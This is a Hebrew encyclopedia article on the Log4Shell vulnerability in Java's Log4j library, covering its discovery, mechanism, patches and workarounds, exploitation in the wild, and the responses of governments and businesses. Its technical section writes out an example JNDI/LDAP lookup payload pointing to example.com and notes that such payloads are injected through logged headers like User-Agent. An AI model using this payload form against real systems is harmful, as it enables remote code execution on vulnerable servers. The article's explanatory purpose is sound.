Log4Shell

מתוך המכלול, האנציקלופדיה היהודית
קפיצה לניווט קפיצה לחיפוש

Log4Shell (קוד: CVE-2021-44228) הוא השם שניתן לחולשה בספרייה Log4j, ספריית לוגים פופולרית של Java, המאפשרת הרצת קוד שרירותי (Remote Code Execution).[1][2] פגיעה זו, שלא הבחינו בקיומה מאז 2013 - נחשפה באופן פרטי לקרן התוכנה אפאצ'י, ש-Log4j הוא פרויקט שלה, על ידי צוות האבטחה בענן של קבוצת עליבאבא ב-24 בנובמבר 2021, ונחשפה בפומבי ב-9 בדצמבר 2021.[3][4][5][6]

קרן Apache העניקה ל-Log4Shell דירוג חומרת CVSS של 10, הגבוה ביותר האפשרי.[7] ההערכה היא שהפגיעות משפיעה על מאות מיליוני מכשירים.[6]

החולשה מנצלת את היכולת של Log4j המאפשרת בקשות לשרתי LDAP ו-JNDI שרירותיים, מבלי לבדוק את התגובות.[1][8][9] בקשות אלו מאפשרות לתוקפים להריץ קוד Java שרירותי בשרת או במחשב אחר, או להדליף מידע רגיש.[5]

שירותים רבים התגלו כפגיעים לחולשה, ורשימה של פרויקטי התוכנה המושפעים פורסמה על ידי צוות האבטחה של Apache.[10] השירותים המסחריים המושפעים כוללים את AWS,[11] Cloudflare, iCloud,[12] Minecraft: Java Edition,[13] סטים Tencent QQ ועוד רבים אחרים.[8][14][15]

Log4Shell היא אחת מהחולשות החמורות ביותר שהתגלו מעולם. חברת LunaSec אפיינה את הפגיעות כ"כשל עיצובי בעל פרופורציות קטסטרופליות",[5] חברת Teneble אמרה כי החולשה הייתה "הפגיעות הגדולה והקריטית ביותר אי פעם",[16] ו- Ars Technica כינתה זאת "ללא ספק הפגיעה החמורה ביותר אי פעם".[17]

רקע

ערך מורחב – Log4j

Log4j היא ספריית קוד פתוח המאפשרת למפתחי תוכנה לרשום (log) נתונים בתוך האפליקציות שלהם. נתונים אלה יכולים לכלול קלט משתמש.[18] הספרייה נמצאת בשימוש כמעט בכל מקום ביישומי Java, במיוחד בתוכנות ארגוניות.[5]

הספרייה נכתבה במקור בשנת 2001 על ידי Ceki Gülcü, וכעת היא חלק מ- Apache Logging Services, פרויקט של קרן התוכנה אפאצ'י.[19] חבר בוועדת אבטחת הסייבר לשעבר של הנשיא ברק אובמה, טום קלרמן, תיאר את אפאצ'י כ"אחת התומכות הענקיות של גשר המאפשר את רקמת החיבור בין עולמות היישומים וסביבות המחשב".[20]

תיאור

ממשק ה-JNDI של Java (בראשי תיבות: ה-Java Native Direcotry Interface), מאפשר חיפוש של אובייקטי Java בזמן ריצה בהינתן כתובת למקום שמאחסן את הנתונים שלהם. JNDI יכול לעבוד עם מספר ממשקי Directory, כאשר כל אחד מספק "סכימה" שונה של חיפוש קבצים. בין הממשקים הללו ניתן למצוא את LDAP, המאחזר את נתוני האובייקט ככתובת URL משרת מתאים, מקומי או מכל מקום באינטרנט.[21]

בקונפיגורציה הרגילה, כאשר log4j כותבת הודעת לוג, מתבצעת פעולת חיפוש והחלפה של מחרוזות מיוחדות מהצורה {prefix:name}$ בתוך ההודעה הנכתבת. חלק מהתבניות המיוחדות שיכולות להיות מזוהות היא הצורה{<jndi:<lookup}$; על ידי הכנסת מחרוזת כזו עם שרת lookup בשליטת התוקף (מסוג LDAP, למשל), הספרייה תפנה לכתובת ה-URL הרשומה באמצעות פרוטוקול ה-LDAP ותטען את הנתונים בו כאובייקטי Java. כך לדוגמה, ניסיון הדפסה של המחרוזת {jndi:ldap://example.com/file}$, יגרור טעינה של הקוד שמאוחסן בכתובת זו, גם אם מדובר בשרת חיצוני.

משום שבקשות HTTP נכתבות פעמים רבות ללוג, ווקטור תקיפה נפוץ הוא הכנסה של המחרוזת הזדונית לתוך HTTP Header שמתועד פעמים רבות, כגון User-Agent.

מניעה

התיקון עבור פגיעות אלו פורסמו ב-6 בדצמבר 2021, שלושה ימים לפני פרסום הפגיעות, בגרסה 2.15.0-rc1 של Log4j.[22] התיקון כלל הגבלת השרתים והפרוטוקולים שניתן להשתמש בהם לצורך חיפושים (lookups) של אובייקטים. לאחר מכן חוקרים גילו באג קשור, CVE-2021-45046, המאפשר הרצת קוד בצורה מקומית או מרוחקת בתצורות מסוימות שאינן ברירת מחדל. באג זה תוקן בגרסה 2.16.0, אשר השביתה את כל תכונות ה-JNDI ואת תמיכה בחיפושי הודעות (message lookups).[23][24]

עבור גרסאות קודמות, מומלץ להסיר את המחלקה org.apache.logging.log4j.core.lookup.JndiLookup ממשתנה ה-classpath כדי למנוע ניצול של שתי הפגיעויות.[7][23] בנוסף, ניתן לשנות את ה-system property בשם log4j2.formatMsgNoLookups ל- true, אך שינוי זה אינו מונע ניצול של CVE-2021-45046.[23]

גרסאות חדשות יותר של Java Runtime Environment (JRE) מפחיתות את הפגיעות הזו על ידי חסימת טעינת קוד מרחוק כברירת מחדל, אם כי וקטורי תקיפה אחרים עדיין קיימים ביישומים מסוימים.[1][25][26] פורסמו מספר שיטות וכלים כדי לסייע בזיהוי של שימוש בגרסאות log4j פגיעות בחבילות Java.[27]

ניצול

החולשה מאפשרת להאקרים להשיג שליטה על מכשירים פגיעים באמצעות Java.[6] ההאקרים משתמשים בפגיעות כדי לנצל את היכולות של מכשירי הקורבנות; השימושים כוללים כריית מטבעות קריפטוגרפיים, יצירת רשתות בוטים, שליחת דואר זבל ופעילויות לא חוקיות אחרות כגון התקפות כופר.[6][28] בימים שלאחר פרסום הפגיעות, חברת צ'ק פוינט עקבה אחרי מיליוני התקפות שיזמו האקרים, כאשר כמה חוקרים צפו בקצב של למעלה ממאה התקפות לדקה, שהביא בסופו של דבר לתוצאה של כמעל 40% מהרשתות העסקיות בעולם שהותקפו.[6][20]

לדברי מנכ"ל Cloudflare, מתיו פרינס, עדויות לשימוש או בדיקה להימצאות של החולשה נצפו כבר ב-1 בדצמבר, תשעה ימים לפני שהחולשה נחשפה בפומבי.[29] בנוסף, לדברי GreyNoise, חברת אבטחה מקוונת, מספר כתובות IP כבר סרקו אתרים במקרה למצוא שרתים פגיעים.[30] כמה botnets התחילו לסרוק את הפגיעות, כולל Muhstik botnet, כמו גם "מיראי", צונאמי ו-XMRig.[6][29][31] כמה קבוצות מדינתיות בסין ובאיראן ניצלו את הפגיעות, לפי צ'ק פוינט.[16]

תגובה והשפעה

ממשלות

בארצות הברית, מנהל הסוכנות לאבטחת סייבר ותשתיות (CISA), ג'ן איסטרלי, תיאר את החולשה כ"אחת הרציניות שראיתי בכל הקריירה שלי, אם לא החמורה ביותר", והסביר כי מאות מיליוני מכשירים הושפעו תוך שהוא מייעץ לספקים לתעדף עדכוני תוכנה.[32][6][28]

המרכז הקנדי לאבטחת סייבר (CCCS) קרא לארגונים לנקוט בפעולה מיידית.[33] סוכנות ההכנסה של קנדה סגרה זמנית את השירותים המקוונים שלה לאחר שנודע על החולשה, בעוד שממשלת קוויבק סגרה כמעט 4,000 מאתרי האינטרנט שלה כ"צעד מונע".[34]

המשרד הפדרלי לביטחון מידע הגרמני (BSI) הגדיר את החולשה כרמת האיום הגבוהה ביותר של הסוכנות, וכינה אותה "מצב איום קריטי ביותר" (מתורגם). הארגון גם דיווח כי מספר התקפות כבר היו מוצלחות וכי עדיין קשה להעריך את היקף הניצול.[35][36] מרכז אבטחת הסייבר הלאומי של הולנד (NCSC) החל ברשימה מתמשכת של יישומים פגיעים.[37][38]

עסקים

חברת ניהול משאבי אנוש וניהול כוח אדם, UKG, אחד העסקים הגדולים בתעשייה, הייתה מטרה למתקפת כופר שהשפיעה על עסקים גדולים.[17][39] UKG מסרה כי אין לה ראיות לניצול של Log4Shell בתקרית, אם כי האנליסט אלן ליסקה מחברת אבטחת הסייבר Recorded Future אמר כי ייתכן שיש קשר.[39] כאשר חברות גדולות יותר החלו לשחרר תיקונים לחולשה, הסיכון לעסקים קטנים גדל כאשר האקרים התמקדו ביעדים פגיעים יותר.[28]

ראו גם

קישורים חיצוניים

הערות שוליים

  1. ^ 1.0 1.1 1.2 Wortley, Free; Thrompson, Chris; Allison, Forrest (9 בדצמבר 2021). "Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package". LunaSec (באנגלית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  2. ^ "CVE-2021-44228". Common Vulnerabilities and Exposures. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  3. ^ Povolny, Steve; McKee, Douglas (10 בדצמבר 2021). "Log4Shell Vulnerability is the Coal in our Stocking for 2021". McAfee (באנגלית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  4. ^ "Worst Apache Log4j RCE Zero day Dropped on Internet". Cyber Kendra. 9 בדצמבר 2021. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  5. ^ 5.0 5.1 5.2 5.3 Newman, Lily Hay (10 בדצמבר 2021). "'The Internet Is on Fire'". Wired (באנגלית אמריקאית). ISSN 1059-1028. נבדק ב-12 בדצמבר 2021. {{cite news}}: (עזרה)
  6. ^ 6.0 6.1 6.2 6.3 6.4 6.5 6.6 Murphy, Hannah (2021-12-14). "Hackers launch more than 1.2m attacks through Log4J flaw". Financial Times. נבדק ב-2021-12-17.
  7. ^ 7.0 7.1 "Apache Log4j Security Vulnerabilities". Log4j. Apache Software Foundation. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  8. ^ 8.0 8.1 Mott, Nathaniel (10 בדצמבר 2021). "Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit". PC Magazine (באנגלית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  9. ^ Goodin, Dan (10 בדצמבר 2021). "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet". Ars Technica (באנגלית אמריקאית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  10. ^ "Apache projects affected by log4j CVE-2021-44228". 14 בדצמבר 2021. {{cite web}}: (עזרה)
  11. ^ "Update for Apache Log4j2 Issue (CVE-2021-44228)". Amazon Web Services. 12 בדצמבר 2021. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  12. ^ Lovejoy, Ben (14 בדצמבר 2021). "Apple patches Log4Shell iCloud vulnerability, described as most critical in a decade". 9to5mac. {{cite web}}: (עזרה)
  13. ^ "Security Vulnerability in Minecraft: Java Edition". Minecraft. Mojang Studios. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  14. ^ Goodin, Dan (10 בדצמבר 2021). "The Internet's biggest players are all affected by critical Log4Shell 0-day". ArsTechnica. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  15. ^ Rundle, David Uberti and James (15 בדצמבר 2021). "What Is the Log4j Vulnerability?". {{cite web}}: (עזרה)
  16. ^ 16.0 16.1 Barrett, Brian. "The Next Wave of Log4J Attacks Will Be Brutal". Wired (באנגלית אמריקאית). ISSN 1059-1028. נבדק ב-2021-12-17.
  17. ^ 17.0 17.1 Goodin, Dan (2021-12-13). "As Log4Shell wreaks havoc, payroll service reports ransomware attack". Ars Technica (באנגלית אמריקאית). נבדק ב-2021-12-17.
  18. ^ Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 בדצמבר 2021). "Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)". Unit 42. Palo Alto Networks. {{cite web}}: (עזרה)
  19. ^ "Apache Log4j 2". Apache Software Foundation. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  20. ^ 20.0 20.1 Byrnes, Jesse (2021-12-14). "Hillicon Valley — Apache vulnerability sets off alarm bells". TheHill (באנגלית). נבדק ב-2021-12-17.
  21. ^ Graham-Cumming, John (10 בדצמבר 2021). "Inside the Log4j2 vulnerability (CVE-2021-44228)". The Cloudflare Blog (באנגלית). נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  22. ^ "Restrict LDAP access via JNDI by rgoers #608". Log4j (באנגלית). 5 בדצמבר 2021. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  23. ^ 23.0 23.1 23.2 "CVE-2021-45046". Common Vulnerabilities and Exposures. 15 בדצמבר 2021. נבדק ב-15 בדצמבר 2021. {{cite web}}: (עזרה)
  24. ^ Greig, Jonathan (14 בדצמבר 2021). "Second Log4j vulnerability discovered, patch already released". ZDNet (באנגלית). נבדק ב-17 בדצמבר 2021. {{cite web}}: (עזרה)
  25. ^ Ducklin, Paul (12 בדצמבר 2021). "Log4Shell explained – how it works, why you need to know, and how to fix it". Naked Security. Sophos. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  26. ^ "Exploiting JNDI Injections in Java". Veracode. 2019-01-03. נבדק ב-2021-12-15.
  27. ^ "Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228)". www.lunasec.io (באנגלית). 13 בדצמבר 2021. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  28. ^ 28.0 28.1 28.2 Woodyard, Chris. "'Critical vulnerability': Smaller firms may find it harder to stop hackers from exploiting Log4j flaw". USA Today (באנגלית אמריקאית). נבדק ב-2021-12-17.
  29. ^ 29.0 29.1 Duckett, Chris. "Log4j RCE activity began on 1 December as botnets start using vulnerability". ZDNet (באנגלית). נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  30. ^ "Exploit activity for Apache Log4j vulnerability - CVE-2021-44228". Greynoise Research. 10 בדצמבר 2021. נבדק ב-14 בדצמבר 2021. {{cite web}}: (עזרה)
  31. ^ Zugec, Martin (13 בדצמבר 2021). "Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild". Business Insights. Bitdefender. {{cite web}}: (עזרה)
  32. ^ "Statement from CISA Director Easterly on "Log4j" Vulnerability". CISA. 11 בדצמבר 2021. {{cite web}}: (עזרה)
  33. ^ "Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action". Government of Canada (באנגלית). 12 בדצמבר 2021. {{cite web}}: (עזרה)
  34. ^ Cabrera, Holly (12 בדצמבר 2021). "Facing cybersecurity threats, Quebec shuts down government websites for evaluation". CBC News. נבדק ב-12 בדצמבר 2021. {{cite news}}: (עזרה)
  35. ^ Sauerwein, Jörg (12 בדצמבר 2021). "BSI warnt vor Sicherheitslücke". Tagesschau (בגרמנית). {{cite web}}: (עזרה)
  36. ^ "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [Red alarm: Log4Shell vulnerability causes extremely critical threat situation] (Press release) (בגרמנית). Federal Office for Information Security. 11 בדצמבר 2021. {{cite press release}}: (עזרה)
  37. ^ J. Vaughan-Nichols, Steven (14 בדצמבר 2021). "Log4Shell: We Are in So Much Trouble". The New Stack. {{cite web}}: (עזרה)
  38. ^ "NCSC-NL/log4shell". National Cyber Security Centre (Netherlands). נבדק ב-14 בדצמבר 2021. {{cite web}}: (עזרה)
  39. ^ 39.0 39.1 Bray, Hiawatha (15 בדצמבר 2021). "Emerging 'Log4j' software bug spawns worldwide worry over cyber attacks - The Boston Globe". The Boston Globe (באנגלית אמריקאית). נבדק ב-2021-12-17. {{cite web}}: (עזרה)
הערך באדיבות ויקיפדיה העברית, קרדיט,
רשימת התורמים
רישיון cc-by-sa 3.0

37000458Log4Shell